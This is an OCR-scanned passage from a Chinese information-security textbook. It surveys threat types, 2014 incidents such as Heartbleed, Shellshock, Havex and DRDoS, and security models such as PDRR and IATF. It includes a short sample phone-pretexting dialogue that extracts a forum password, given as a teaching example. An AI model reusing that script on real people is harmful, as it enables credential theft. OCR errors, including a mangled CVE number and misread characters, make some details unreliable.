(3) 内 部 窃 密 和 破坏 : 内 部 或 本 系统 的 人 员 通 过 网 络 窃取 机 密 、 泄 露 或 更 改 信息 以 
及 破坏 信息 系统 。 据 美国 联邦 调查 局 的 一 项 调查 显示 ,70% 的 攻击 是 从 内 部 发 动 的 ,只 有 
30% 是 从 外 部 攻 入 的 。 

(4) 黑客 攻击 : 黑客 已 经 成 为 网 络 安 全 的 最 大 隐患 。2000 年 2 月 7 一 9 日 ,美国 著名 
的 雅虎 ,亚马逊 等 八大 项 级 网 站 接连 遭受 来 历 不 明 的 网 络 攻击 ,导致 服务 系统 中 断 ,这 次 
攻击 给 这 些 网 站 造成 的 直接 损失 达 12 亿美 元 ,间接 损失 高 达 100 亿美 元 。 

(5) 技术 缺陷 : 由 于 认识 能 力 和 技术 发 展 的 局 限 性 ,在 硬件 和 软件 设计 过 程 中 ,难免 
留 下 技术 缺陷 ,由 此 可 造成 网 络 的 安全 隐患 。 其 次 ,网 络 硬件 软件 产品 多 数 依 靠 进 口 ,如 
全 球 90% 的 计算 机 都 装 有 微软 的 Windows 系统 ,许多 网 络 黑客 就 是 通过 Windows 系统 
的 漏洞 和 后 门 而 进入 系统 的 。 

(6) 病毒 : 从 1988 年 报道 的 第 一 例 病毒 (蠕虫 病毒 ) 侵 入 美国 军 方 互联 网 ,导致 8500 
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台 计 算 机 感染 和 6500 台 停 机 ,造成 直接 经 济 损失 达 1 亿美 元 ,此 后 这 类 情况 此 起 彼 伏 , 从 
2001 年 红色 代码 到 近 几 年 的 山寨 网 银 客户 端 来 看 ,计算 机 病毒 感染 方式 已 从 单机 的 被 动 
传播 变 成 了 利用 网 络 的 主动 传播 ,从 计算 机 主体 到 手机 移动 终端 的 传播 ,不 仅 带 来 了 网 络 
的 破坏 ,而 且 造 成 用 户 隐 私信 息 的 泄露 甚至 带 来 严重 的 金融 安全 。 

对 以 上 计算 机 网 络 的 安全 威胁 归纳 起 来 常 表现 为 以 下 特征 : 

(1) 窃听 : 攻击 者 通过 监视 网 络 数据 获得 敏感 信息 。 

(2) 重 传 : 攻击 者 先 获得 部 分 或 全 部 信息 ,而 以 后 将 此 信息 发 送 给 接收 者 。 

(3) 伪造 : 攻击 者 将 伪造 的 信息 发 送 给 接收 者 。 

(4) 自 改 : 攻击 者 对 合法 用 户 之 间 的 通信 信息 进行 修改 .删除 ,插入 ,再 发 送 给 接 
收 者 。 

(5) 拒绝 服务 攻击 : 攻击 者 通过 某 种 方法 使 系统 响应 减 慢 甚至 瘫痪 ,阻碍 合法 用 户 
获得 服务 。 

(6) 行为 否认 : 通信 实体 否认 已 经 发 生 的 行为 。 

(7) 非 授权 访问 : 没有 预先 经 过 同意 ,就 使 用 网 络 或 计算 机 资源 。 

(8) 传播 病毒 : 通过 网 络 传播 计算 病毒 ,其 破坏 性 非常 高 ,而 且 用 户 很 难 防范 。 
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当前 针对 重要 信息 系统 .基础 应 用 和 通用 软 硬 件 漏洞 的 攻击 异常 活跃 ,漏洞 风险 向 传 
统领 域 . 智 能 终端 领域 泛 化 演进 。 网 站 数据 和 个 人 信息 泄露 现象 依然 严重 ,移动 应 用 程序 
成 为 数据 泄露 的 新 主体 。 移 动 恶 意 程序 不 断 发 展演 化 ,环境 治理 仍然 面临 挑战 。 

信息 安全 威胁 的 基本 类 型 有 : 

1) 针对 网 络 基础 设施 的 攻击 

近年 来 ,我国 基础 网 络 安全 防护 水 平 进一步 提升 ,但 是 基础 网 络 设备 仍 存在 较 多 安全 
漏洞 ,深层 次 安全 风险 和 事件 逐渐 增多 。 这 些 漏洞 将 可 能 导致 网 络 设备 或 结 点 被 操控 ,出 
现 窃取 用 户 信息 、 传 播 恶意 代码 .实施 网 络 攻击 、 破 坏 网 络 稳定 运行 等 安全 事件 。 云 服务 
日 益 成 为 网 络 攻击 的 重点 目标 。 

域名 系统 承担 域名 解析 工作 ,面临 严重 的 拒绝 服务 攻击 威胁 ,一 些 重 要 网 站 频繁 发 生 
域名 解析 被 算 改 事件 。2014 年 发 生 了 多 起 国内 政府 网 站 、 重 要 媒体 或 企 事 业 单 位 网 站 域 
名 解析 被 算 改 的 事件 。 某 省 重要 新 闻 网 站 在 短 时 间 内 连续 数 次 遭受 域名 解析 被 恶意 算 改 
的 攻击 ,黑客 入 侵 该 网 站 域名 注册 服务 商 的 业务 系统 ,直接 算 改 数据 库 中 相应 数据 ,获取 
该 网 站 的 域名 管理 权限 ,将 其 域名 解析 服务 器 算 改 为 专门 提供 免费 域名 解析 的 DNSPOD 
服务 器 地 址 ,并 将 其 域名 指向 境外 地 址 。 

工业 互联 网 是 全 球 工业 系统 与 高 级 计算 、 分 析 、 感 应 技术 以 及 互联 网 连接 融合 的 结 
果 。 它 通过 智能 机 器 间 的 连接 并 最 终 将 人 机 连接 ,结合 软件 和 大 数据 分 析 , 重 构 全 球 工 
业 、 激 发 生产 力 , 让 世界 更 美好 、 更 快速 、 更 安全 、 更 清洁 且 更 经 济 。 当 前 ,网 络 攻 击 威胁 日 
益 向 工业 互联 网 渗透 。 根 据 国际 有 关机 构 披 露 ,.2014 年 9 月 出 现 一 种 远程 木马 “Havex”， 
它 利用 OPC 工业 通信 技术 ,具有 很 强 的 针对 性 ,主要 功能 是 扫描 发 现 工业 系统 联网 设备 ， 
收集 工控 设备 详细 信息 并 秘密 回 传 . 预 置 后 门 并 在 必要 时 接收 、 执 行 控制 端 发 送 的 恶意 代 
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码 ,全 球 能 源 行 业 的 数 千 个 工业 控制 系统 曾 被 其 入 侵 。 据 监测 ,我 国境 内 已 有 部 分 IP 地 
址 感 当 了 该 恶意 程序 ,所 对 应 的 控制 端 均 位 于 境外 ,并 存在 部 分 IP 地 址 持续 向 控制 端 发 
送信 息 的 情况 。 

2) 针对 公共 互联 网 的 攻击 

针对 公共 互联 网 的 攻击 ,主要 表现 在 木马 僵尸 网 络 .拒绝 服务 攻击 安全 漏洞 、 网 络 数 
据 泄露 .移动 互联 网 恶意 程序 、 网 页 仿冒 、 网 站 攻击 等 。 

以 拒绝 服务 攻击 为 例 ,分 布 式 反射 型 攻击 (Distributed Reflection Denial of Service， 
DRDoS) 逐 渐 成 为 拒绝 服务 攻击 的 重要 形式 。 分 布 式 反射 型 攻击 是 指 黑客 不 直接 攻击 目 
标 , 而 利用 互联 网 的 一 些 网 络 服务 协议 和 开放 服务 器 ,伪造 被 攻击 目标 地 址 向 开放 服务 器 
发 起 大 量 请 求 包 ,服务 器 向 攻击 目标 反馈 大 量 应答 包 ,间接 发 起 攻击 。 这 种 方式 能 够 隐藏 
攻击 来 源 , 以 较 小 代价 实现 攻击 规模 放大 , 且 攻 击 目标 难以 防御 。 此 类 攻击 在 我 国 呈 现 三 
个 明显 特点 。 一 是 频繁 发 生 且 流量 规模 大 。 仅 2014 年 10 月 ,我 国 就 有 数 十 个 重要 政府 
的 网 站 和 邮件 系统 遭受 此 类 攻击 ,部 分 攻击 流量 规模 超过 10Gbit/s。 二 是 攻击 方式 复杂 
多 样 。 攻 击 者 综合 运用 DNS 协议 .NTP、UPnP 协议 .CHARGEN 等 进行 攻击 ,防御 困 
难 。 三 是 攻击 包 来 源 以 境外 为 主 。 在 2014 年 发 现 的 分 布 式 反 射 型 攻击 中 , 绝 大 部 分 伪造 
的 请 求 包 来 自 境外 ,一 方面 是 由 于 我 国 基础 网 络 持续 开展 虚假 源 地 址 流量 整治 工作 ,攻击 
者 难以 从 境内 网 络 发 出 此 类 伪造 包 ; 另 一 方面 也 从 一 定 程 度 上 反映 出 境外 对 我 国 攻击 
频繁 。 

在 安全 漏洞 方面 ,涉及 重要 行业 和 政府 部 门 的 高 危 漏 洞 事件 增多 ,基础 应 用 或 通用 软 
硬件 漏洞 风险 凸显 。 由 于 基础 应 用 和 通用 软 硬 件 产品 部 署 广泛 ,漏洞 容易 被 批量 利用 ,而 
且 定 位 和 修复 困难 ,影响 范围 可 能 波及 全 网 ,危害 程度 远大 于 一 般 漏洞 。2014 年 4 月 8 
日 ,开源 加 密 协 议 Open SSL 被 披露 存在 内 存 泄露 高 危 漏 洞 (CNVD? 编号 : CNVD-2014- 
02175 ,对 应 CVE-2014-01609) ,又 称 * 心 脏 出 血 (HeartBleed)” 漏 洞 , 利 用 该 漏洞 可 窃取 服 
务 器 敏感 信息 ,实时 获取 用 户 的 账号 和 密码 ,危害 波及 大 量 互 联网 站 、 电 子 商 务 、 网 上 支 
付 、 即 时 聊天 、 办 公 系 统 、 邮 件 系统 等 。 据 抽样 统计 ,我 国境 内 受 该 漏洞 影响 的 IP 地 址 超 
过 3 万 个 。2014 年 9 月 25 日 ,GNUBASH(Bourne Again SHell) 组 件 被 披露 存在 远程 代 
码 执行 高 危 漏洞 (CNVD 编号 : CNVD-2014-06345, 对 应 CVE-2014-6271) ,又 称 “ 破 这 
(Bash Shell Shock) ”漏洞 ,Redhat、Fedora、CentOS、Ubuntu、Debian、MAC OS 等 几乎 目 
前 所 有 主流 UNIX/Linux 操作 系统 平台 、 使 用 ForceCommand 功能 的 OpenSSH SSHD、 
使 用 mod_cgi 或 mod_cgid 的 Apache 服务 器 .DHCP 客户 端 和 其 他 使 用 BASH 作为 解释 
器 的 应 用 均 受 到 影响 ,不 仅 是 服务 器 系统 ,还 包括 交换 机 、 防 火 墙 . 网 络 设备 以 及 摄像 头 、 
IP 电话 等 许多 基于 Linux 的 定制 系统 ,影响 范围 比 * 心 脏 出 血 ? 漏 洞 更 为 严重 。 根 据 对 部 
分 漏洞 的 持续 监测 来 看 ,漏洞 修复 的 速度 总 体 较 为 缓慢 。“ 心 脏 出 血 ”漏洞 披露 3 个 月 后 
发 现 仍 有 约 16% 尚 未 修复 ,而 知名 度 相 对 较 低 的 Ngnix 文件 解析 漏洞 (影响 Web 应 用 ) 
在 披露 1 年 后 未 修复 率 仍 高 达 55%。 此 外 ,2014 年 4 月 8 日 微软 公司 正式 停止 对 


@@ 国家 信息 安全 漏洞 共享 平台 (China National Vulnerability Database,CNVD) 。 
@ ”CVE 的 英文 全 称 是 Common Vulnerabilities & Exposures, 意 为 公共 漏洞 和 暴露 . 
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Windows XP 系统 的 支持 服务 ,而 从 4 月 底 至 8 月 中 旬 的 抽样 监测 统计 发 现 , 在 我 国 使 用 
微软 操作 系统 的 用 户 中 ,超过 半数 仍 在 使 用 Windows XP 系统 ,这 些 用 户 在 未 来 相当 长 的 
一 段 时 间 内 将 面临 严重 的 “ 零 日 攻击 ”风险 。 

此 外 ,移动 应 用 程序 成 为 数据 泄露 的 新 主体 。2014 年 , 订 票 .社交 、 点 评 、 论 坛 、 浏 览 
器 等 国内 多 种 知名 移动 应 用 发 生 用 户 数据 泄露 事件 。 一 些 移动 应 用 开发 者 经 验 不 足 , 安 
全 意识 和 水 平 不 够 ,网 站 服务 器 对 移动 端的 访问 控制 机 制 较 弱 ,黑客 利用 移动 应 用 程序 与 
网 站 服务 器 之 间 的 接口 漏洞 ,对 网 站 服务 器 发 起 攻击 ,能够 轻易 获得 相应 服务 器 的 地 址 和 
接口 信息 , 青 通 过 挖掘 接口 漏洞 ,直接 获取 服务 器 中 所 有 信息 ,造成 信息 泄露 。 

3) 新 兴 信息 技术 带 来 的 安全 威胁 

新 兴 信 息 技术 日 新 月 异 , 物 联网 、 云 计算 、 大 数据 和 移动 互联 网 被 称 为 新 一 代 信 息 技 
术 “ 四 驾 马 车 ”"。 这 些 技术 提供 了 科技 发 展 的 核心 动力 ,在 给 政府 、 企 业 、 社 会 和 人 民 带 来 
极 大 的 便利 的 同时 ,也 促 生 了 不 同 于 以 往 的 安全 问题 和 威胁 。 现 有 的 安全 理论 与 实践 大 
多 是 针对 传统 的 计算 模式 而 生 , 不 能 完全 适用 于 云 计算 、 大 数据 的 新 的 商业 模式 和 技术 
架构 。 

以 云 计算 为 例 ,其 一 大 特征 是 自助 服务 ,在 给 用 户 带 来 方便 的 同时 ,也 给 攻击 者 提供 
了 机 会 。 攻 击 者 可 以 利用 云 服务 简单 方便 的 注册 步骤 和 相对 较 弱 的 身份 审查 要 求 ,使 用 
虚假 信息 注册 ,冒充 正常 用 户 , 然 后 通过 云 模 式 强大 的 计算 能 力 , 向 其 他 目标 发 起 各 种 各 
样 的 攻击 。 从 云 中 对 很 多 重要 领域 直接 的 破坏 活动 ,如 垃圾 邮件 的 制作 传播 ,用 户 密 钥 的 
分 布 式 破解 ,网 站 的 分 布 式 拒绝 服务 攻击 ,反动 .黄色 和 钓鱼 其 诈 等 不 良 信息 的 云 缓 冲 , 以 
及 僵尸 网 络 的 命令 和 控制 等 。 

此 外 ,所 有 的 IT 服务 都 面临 内 部 人 员 破 坏 的 风险 。 内 部 人 员 可 以 单独 行动 或 勾结 
其 他 人 ,利用 访问 特权 进行 恶意 的 或 非法 的 危害 他 人 的 行动 。 内 部 人 员 进 行 破坏 的 原因 
是 多 种 多 样 的 ,比如 为 某 件 事 进行 报复 ,或 者 是 发 泄 他 们 心中 对 社会 的 不 满 , 或 者 为 了 获 
得 物质 利益 。 在 云 计算 时 代 , 这 种 威胁 可 能 会 大 大 增加 。 一 方面 , 云 服务 商 一 般 拥 有 大 量 
企业 用 户 ,雇用 的 IT 管理 人 员 数 量 比 单独 一 个 企业 的 IT 管理 人 员 多 很 多 ; 另 一 方面 , 云 
计算 也 是 IT 服务 外 包 的 一 种 形式 ,所 以 也 继承 了 外 包 服 务 商 的 恶意 内 部 人 员 风 险 。 因 
此 要 高 度 重视 建立 内 部 控制 机 制 , 防 止 发 生 内 部 人 员 滥 用 权限 和 恶意 攻击 。 
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社会 工程 学 (Social Engineering) 又 被 翻译 为 社交 工程 学 ,是 一 种 通过 对 受害 者 心理 
弱点 .本 能 反应 .好奇 心 信任 、 贪 禁 等 心理 陷阱 进行 诸如 欺骗 .伤害 等 危害 手段 取得 自身 
利益 的 手法 ,已 成 迅速 上 升 甚至 滥用 的 趋势 。 社 会 工程 学 陷阱 就 是 通常 以 交谈 欺骗、 假 
冒 或 口语 等 方式 ,从 合法 用 户 中 套 取 用 户 系统 的 秘密 。 社 会 工程 学 是 一 种 黑客 攻击 方法 ， 
利用 欺骗 等 手段 骗取 对 方 信任 ,获取 机 密 情 报 。 

所 有 社会 工程 学 攻击 都 建立 在 使 人 判断 产生 认 知 偏差 的 基础 上 。 有 时 候 这 些 偏差 被 
称 为 "人 类 硬件 漏洞 ”, 足 以 产生 众多 攻击 方式 ,其 中 一 些 包 括 : 

(1) 假托 (pretexting) 是 一 种 制造 虚假 情形 ,以 迫使 针对 受害 人 吐露 平时 不 愿 泄露 的 
信息 的 手段 。 该 方法 通常 对 特殊 情景 专用 术语 的 研究 ,以 建立 合情合理 的 假象 。 
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(2) 调 虎 离 山 (diversion theft) 。 

(3) 钓鱼 (phishing) 。 

(4) 在 线 聊天 /电话 钓鱼 (IVR/phone phishing,IVR: interactive voice response) 。 

(5) 下 饵 (Baiting) 。 

(6) 等 价 交换 (Quid pro quo) 。 攻 击 者 伪装 成 公司 内 部 技术 人 员 或 者 问卷 调查 人 员 ， 
要 求 对 方 给 出 密码 等 关键 信息 。 如 攻击 者 也 可 能 伪装 成 公司 技术 支持 人 员 必 帮助 ”解决 
技术 问题 ,悄悄 植 和 人 恶意 程序 或 盗 取信 息 。 

(7) 尾随 (CTailgating) 。 

举 个 例子 9 ,假设 我 们 通过 目标 的 同事 掌握 了 信息 ,比如 目标 的 真实 姓名 、 联 系 方式 、 
作息 时 间 等 等 。 这 还 不 够 ,高 明 的 社会 工程 学 攻击 者 会 把 前 前 后 后 的 信息 进行 组 织 、 归 
类 ,筛选 。 以 构造 精心 准备 的 陷阱 ,这 样 ,可 使 目标 自行 走 和 人 。 请 看 以 下 对 话 : 

A: 你 现在 打 不 开 论坛 对 吗 ? 

B: 是 的 ,打开 是 一 片 空 白 。 

A: 那 是 由 于 身份 认证 错误 ,我 是 XX 论坛 管理 员 , 你 要 把 论坛 的 用 户 名 与 密码 发 送 
到 XX ,以 使 系统 稍 后 恢复 你 的 访问 。 

B: 现在 吗 ? 

A: 是 的 ,我 得 马上 给 你 恢复 ,不 然 账户 作废 了 。 

这 样 ,A 很 顺利 得 到 B 在 某 论 坛 的 VIP 账户 ,论坛 为 什么 打 不 开 了 。 从 这 个 例子 我 
们 可 以 看 出 组 织 信息 的 重要 性 ,如 果 B 能 正确 回答 第 一 个 问题 ,A 可 能 会 考虑 换 种 方式 ， 
这 个 案例 非常 的 简单 , 那 就 是 B 对 计算 机 方面 不 了 解 ,害怕 账户 丢失 ,一 点 也 不 怀疑 A 就 
给 了 密码 ,而 这 个 密码 近乎 通用 了 ,大 多 数 网 民 的 密码 几乎 都 为 通用 的 ,这 样 会 造成 非常 
大 的 损失 ,例如 一 个 黑客 ,他 拖 走 了 这 个 论坛 的 数据 库 ,也 许 他 的 目标 就 是 你 ,将 其 论坛 加 
密 的 密码 进行 破解 ,那么 你 的 密码 就 已 经 泄漏 了 ,这 并 不 重要 ! 要 命 的 是 如 何 发 现 你 的 密 
码 是 通用 的 (通常 社工 者 拿 到 一 个 密码 之 后 会 先 测试 一 下 你 的 邮箱 密码 是 不 是 也 是 同样 
的 ) ,如 何 被 确认 为 是 通用 的 ,那么 就 将 会 发 生 损 失 最 大 的 “一 个 密码 引发 的 血案 ”! 所 以 
在 不 同 的 账户 不 要 使 用 同一 个 密码 ,永远 不 要 把 密码 告诉 第 三 者 是 多 么 的 重要 ! 

网 页 仿冒 俗称 网 络 钓 鱼 (phishing) ,是 社会 工程 学 欺骗 原理 与 网 络 技术 相 结合 的 典 
型 应 用 。2014 年 ,CNCERT/CC 共 抽 样 监测 到 仿冒 我 国境 内 网 站 的 钓鱼 页 面 99 409 个 ， 
涉及 6844 个 IP 地 址 ,平均 每 个 IP 地址 承载 14. 5 个 钓鱼 页 面 。 在 这 6844 个 IP 地 址 中 ， 
有 89.4% 位 于 我 国 大 陆地 区 之 外 ,其 中 美国 (17.7%) 中国 香港 (15. 2%) 和 韩国 (1. 8%) 
居 前 3 位 ,分 别 承载 了 10 265 个 、29 237 个 和 10 790 个 针对 我 国 大 陆地 区 网 站 的 钓鱼 
页 面 。 

由 于 多 数 境外 地 区 对 于 网 站 的 注册 登记 审核 机 制 比较 宽松 ,而 且 钓 鱼网 站 的 受害 者 
及 相关 法 律 诉讼 大 多 不 在 当地 ,客观 上 为 不 法 分 子 逃 避 法 律 监管 提供 了 便利 ,所 以 近 些 年 
来 , 绝 大 多 数 的 钓鱼 网 站 服务 器 都 分 布 在 境外 地 区 。 但 随 着 安全 厂商 对 于 境外 钓鱼 网 站 


@@ 百度 百科 , http://baike. baidu. com/link? url = {UYwyXOlfbCVDchYklekV2el_ NgVGocr7zqNgUMAAnH2hY- 
f62vS6XQ2cQZ8qsfF. 
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的 识别 能 力 和 打击 力度 不 断 提升 , 极 大 地 压缩 了 境外 钓鱼 网 站 的 生存 空间 ,迫使 相当 数量 
的 攻击 者 开始 转向 租用 国内 服务 器 。 此 外 ,也 有 越 来 越 多 的 攻击 者 开始 通过 自 改 正规 网 
站 , 植 入 钓鱼 网 页 的 方式 发 动 钓鱼 攻击 ,这 种 攻击 方式 更 隐蔽 ,更 不 容易 被 发 现 。 同 时 , 随 
着 云 主 机 服务 的 流行 ,由 于 部 分 云 主机 服务 提供 商 安 全 审核 能 力 的 不 足 , 很 多 攻击 者 还 会 
将 钓鱼 网 站 直接 架设 在 第 三 方 提供 的 具有 合法 备案 资质 的 云 服 务 平台 上 。 这 些 因 素 都 是 
导致 2014 年 国内 钓鱼 网 站 服务 器 多 于 国外 钓鱼 网 站 服务 器 的 重要 原因 。 


3.3 信息 安全 体系 结构 


随 着 信息 技术 的 发 展 与 应 用 ,信息 安全 的 内 涵 在 不 断 地 延伸 ,从 最 初 的 信息 机 密 性 发 
展 到 信息 的 完整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 等 等 ,进而 又 发 展 为 “ 攻 ( 攻 击 )、 防 ( 防 
范 ) 、 测 (检测 ) 、 控 (控制 ) 管 (管理 )、 评 (评估 )” 等 多 方面 的 基础 理论 和 实施 技术 。 人 们 借 
助 信息 安全 体系 结构 (Information Security Architecture,ISA) 能 够 更 清晰 地 梳理 信息 系 
统 中 所 需 安全 理论 和 技术 的 相关 知识 及 其 联系 .加 深 理解 其 内 涵 。 

信息 安全 体系 是 构成 信息 系统 的 组 件 、 环 境 和 人 (用 户 和 管理 者 ) 的 物理 安全 、 运 行 安 
全 数据 安全 内容 安全 应 用 安全 ,管理 安全 与 信息 资产 安全 的 总 和 ,是 一 个 多 维度 .多 元 
素 、 多 层次 、 时 变 的 非 线性 复杂 系统 ,其 最 终 安全 目标 是 控制 信息 系统 的 总 风险 趋 于 稳定 ， 
并 达到 最 小 (绝对 安全 的 信息 系统 是 不 存在 的 )。 相 关 领 域 的 专家 和 学 者 们 从 不 同 的 角度 
对 信息 安全 体系 结构 进行 描述 .归纳 、 分 析 或 设计 出 侧重 点 不 同 的 体系 结构 。 
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信息 安全 的 三 个 最 基本 的 目标 是 CIA, 即 机 密 性 、 完 整 性 和 可 用 性 ,其 概念 的 阐述 源 
自 于 信息 技术 安全 评估 标准 (Information Technology Security Evaluation Criteria, 
ITSEC)。 很 多 的 信息 安全 技术 是 围绕 CIA 三 元 组 来 进行 研究 的 。 

机 密 性 是 指 信息 存储 、 传 输 、 使 用 过 程 中 ,不 会 泄露 给 非 授权 用 户 或 实体 ;完整 性 指 信 
息 在 存储 、 使 用 、 传 输 过 程 中 ,不 会 被 非 授 权 用 户 算 改 或 防止 授权 用 户 对 信息 进行 不 恰当 
的 算 改 ;可 用 性 则 涵盖 的 范围 最 广 , 凡 是 为 了 确保 授权 用 户 或 实体 对 信息 资源 的 正常 使 用 
不 会 被 异常 拒绝 ,允许 其 可 靠 而 及 时 地 访问 信息 资源 的 相关 理论 技术 均 属于 可 用 性 研究 
范畴 。 

围绕 CIA 三 元 组 可 以 构建 信息 安全 的 知识 体系 结构 ,对 所 需 信 息 安全 领域 的 知识 进 
行 梳理 ,其 示意 图 如 3-2 所 示 。 

实际 上 ,CIA 三 元 组 在 内 容 上 存在 一 定 程度 的 交叉 ,因此 支撑 和 保障 其 实现 的 信息 
安全 知识 、 技 术 之 间 也 是 相互 交叉 的 ,例如 : 密码 学 知识 是 实现 三 个 目标 的 共同 基础 ; 
SSL、PGP 等 技术 能 够 实现 完整 性 和 机 密 性 需求 。 

除了 CIA 三 元 组 外 ,信息 安全 还 有 一 些 其 他 普遍 认可 的 基本 特征 和 目标 ,包括 不 可 
否认 性 (Non-repudiation)、 可 认证 性 (Authenticity)、 可 控 性 (Controllability)、 可 追踪 性 
(Accountability) 等 ,这 些 都 是 对 CIA 原则 的 细 化 、 补 充 或 加 强 。 
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完整 性 可 用 性 
图 3-2 面向 目标 的 知识 体系 结构 
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“信息 安全 保障 "这 一 概念 最 早 是 由 美国 国防 部 提出 的 ,将 其 定义 为 : 保护 和 防御 信 
息 及 信息 系统 ,确保 其 机 密 性 .完整 性 .可 用 性 .可 认证 
性 ,不 可 和 否认 性 等 特性 ,包括 信息 系统 中 融和 人 保护 、 检 
测 、 响 应 功能 ,并 提供 信息 系统 的 恢复 功能 。 这 个 定义 
明确 了 机 密 性 、 完 整 性 、 可 用 性 、 可 认证 性 ,不 可 否认 性 x 信息 保障 
这 五 个 安全 属性 ,提出 了 保护 (Protect) ,检测 (Detect)、 (Information 
响应 (React) ,恢复 (Restore) 这 四 个 动态 的 工作 环节 , 强 
调 了 信息 安全 保障 的 对 象 不 仅 是 信息 ,也 包括 信息 系 
统 。 这 就 是 所 谓 的 PDRR 动态 安全 模型 ,如 图 3-3 
所 示 。 

PDRR 模型 把 信息 的 安全 保护 作为 基础 ,将 保护 视 图 3-3 PDRR 模型 
为 活动 过 程 ,要 用 检测 手段 来 发 现 安全 漏洞 .及 时 更 正 ; 
同时 采用 应 急 响 应 措施 对 付 各 种 入 侵 ;在 系统 被 入 侵 后 ,要 采取 相应 的 措施 将 系统 恢复 到 
正常 状态 ,这 样 使 信息 的 安全 得 到 全 方位 的 保障 。 图 3-4 为 PDRR 模型 动态 保护 信息 安 
全 的 示意 图 。 

PDRR 模型 引入 了 保护 时 间 检测 时 间 和 响应 时 间 的 概念 ,通过 数学 公式 指出 只 要 系 
统 的 检测 时 间 加 上 响应 时 间 小 于 系统 保护 时 间 ,就 可 以 称 系统 是 安全 的 。PDRR 是 最 常 
用 的 动态 可 适应 安全 模型 ,能够 为 信息 安全 保障 系统 建设 提供 实践 指导 。 

建设 信息 安全 保障 体系 的 策略 是 增强 系统 针对 威胁 和 攻击 的 防御 能 力 ,我国 信息 安 
全 专家 组 还 提出 在 PDRR 模型 的 前 后 增加 预警 (Warning) 和 反击 (Counterattack) 环 节 ， 
即 WPDRRC 模型 ,以 便 对 受 保护 对 象 提供 更 多 层次 保护 。 

除了 PDRR 安全 保障 体系 外 ,另外 一 个 很 受 人 们 关注 的 体系 是 IATF (Information 


Assurance) 


Ne/ 信息 安全 导论 


保护 


攻击 和 保护 失败 


局 沼 


图 3-4 PDRR 模型 安全 保障 动态 过 程 示意 图 


Assurance Technical Framework, 即 信息 保障 技术 框架 )。 


IATF 是 由 美国 国家 安全 局 组 织 专家 编写 的 一 个 全 面 描述 信息 安全 保障 体系 的 框 
架 , 它 提出 了 信息 保障 时 代 信息 基础 设施 的 全 套 安 全 需求 。IATF 提出 了 信息 保障 依赖 
于 人 操作 和 技术 来 共同 实现 组 织 职能 .业务 运作 的 思想 ,对 技术 信息 基础 设施 的 管理 也 
离 不 开 这 三 个 要 素 。 人 ,借助 技术 的 支持 ,实施 一 系列 的 操作 过 程 ,最 终 实 现 信息 保障 目 
标 ,这 就 是 IATF 最 核心 的 理念 。IATF 定义 了 实现 信息 保障 目标 的 工程 过 程 和 信息 系 
统 各 个 方面 的 安全 需求 。 在 此 基础 上 ,信息 基础 设施 就 可 以 做 到 多 层 防 护 ,这 样 的 防护 被 


称 为 “纵深 防御 战略 (Defense-in-Depth Strategy)”,IATF 核心 思想 如 图 3-5 所 示 。 


成 功 的 组 织 功能 


信息 保障 


纵深 防御 战略 


操作 


技术 


人 


通过 进行 


技术 


网 络 基础 二 
设施 网 络 边界 


计算 环境 


支撑 基础 设施 


KMUPKI | | ae 


操作 


图 3-5 信息 保障 技术 框架 


IATF 综合 运用 人 ,技术 和 操作 的 因素 来 实现 积极 动态 防御 。 不 同 于 WPDRRC 从 安 
全 防护 层次 提出 安全 防护 模型 的 架构 ,IATF 从 信息 系统 的 构成 出 发 提出 了 安全 保障 架 


构 , 这 也 使 其 成 为 被 广泛 使 用 的 流行 前 沿 。 
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333 面向 应 用 的 层次 信息 安全 体系 结构 


信息 系统 的 三 个 基本 要 素 为 人 员 信息 、 系 统 ,针对 三 个 不 同 组 成 部 分 存在 五 个 安全 
层次 ,分 别 为 针对 系统 部 分 的 物理 安全 和 运行 安全 ,针对 信息 部 分 的 内 容 安全 和 数据 安 
全 ,以 及 针对 人 员 部 分 的 管理 安全 ,如 图 3-6 所 示 。 


Ey 


3-6 面向 应 用 的 层次 信息 安全 体系 结构 


这 五 个 安全 层次 存在 着 一 定 的 顺序 关系 ,每 个 层次 均 为 其 上 层 提 供 基础 安全 保证 , 没 
有 下 层 的 安全 ,上 层 安 全 无 从 谈 起 。 同 时 ,各 个 安全 层次 均 依 靠 相应 的 安全 技术 来 提供 保 
障 ,这 些 技术 从 多 角度 全 方位 保证 信息 系统 安全 ,如 果 某 个 层次 的 安全 技术 处 理 不 当 , 信 
息 系 统 的 安全 性 均 会 受到 严重 威胁 。 

物理 安全 是 整个 信息 系统 安全 的 基础 ,包括 实体 安全 和 环境 安全 ,它们 都 是 研究 如 何 
保护 网 络 与 信息 系统 物理 设备 ,主要 涉及 网 络 与 信息 系统 的 机 密 性 、 可 用 性 、 完 整 性 等 属 
性 。 物 理 安全 技术 则 用 来 解决 两 个 方面 的 问题 ,一 方面 是 针对 信息 系统 实体 的 保护 ; 另 一 
方面 针对 可 能 造成 信息 泄露 的 物理 问题 进行 防范 。 因 此 ,物理 安全 技术 包括 防盗 防火、 
防 静 电 、 防 雷击 、 防 信息 泄露 以 及 物理 隔离 等 安全 技术 ;另外 ,基于 物理 环境 的 容 灾 技术 和 
物理 隔离 技术 也 属于 物理 安全 技术 范畴 。 物 理 安全 是 信息 安全 的 必要 前 提 , 如 果 不 能 保 
证 信息 系统 的 物理 安全 ,其 他 一 切 安全 内 容 均 没有 意义 。 

运行 安全 是 指 网 络 及 信息 系统 的 运行 过 程 和 运行 状态 的 保护 ,主要 涉及 网 络 与 信息 
系统 的 真实 性 、 可 控 性 、 可 用 性 等 。 运 行 安全 主要 安全 技术 包括 身份 认证 ,访问 控制 \ 防 火 
墙 \ 入 侵 检 测 、 恶 意 代码 防治 、 容 侵 技术 、 动 态 隔离 、 取 证 技术 、 安 全 审计 、 预 警 技术 以 及 操 
作 系 统 安 全 等 等 ,其 内 容 繁 杂 并 且 在 不 断 地 发 展 变化 。 

数据 安全 主要 关注 信息 系统 中 存储 、 传 输 和 处 理 过 程 中 的 数据 的 安全 性 及 数据 备份 
和 恢复 ,避免 非法 冒充 、 窃 取 、 算 改 、 抵 赖 现象 ,主要 涉及 信息 的 机 密 性 、 真 实 性 、 完 整 性 \ 不 
可 否认 性 等 。 数 据 安全 技术 主要 包括 认证 ,鉴别 、 完 整 性 检验 、 数 字 签 名 、PKI, 安 全 传输 
协议 及 VPN 等 技术 。 

内 容 安全 主要 包括 两 个 方面 内 容 : 一 方面 是 指 合法 的 信息 内 容 加 以 安全 保护 ,如 对 合 
法 的 音像 制品 及 软件 的 版 权 保护 ; 另 一 方面 是 指针 对 非法 信息 内 容 实施 监管 ,如 对 反动 、 
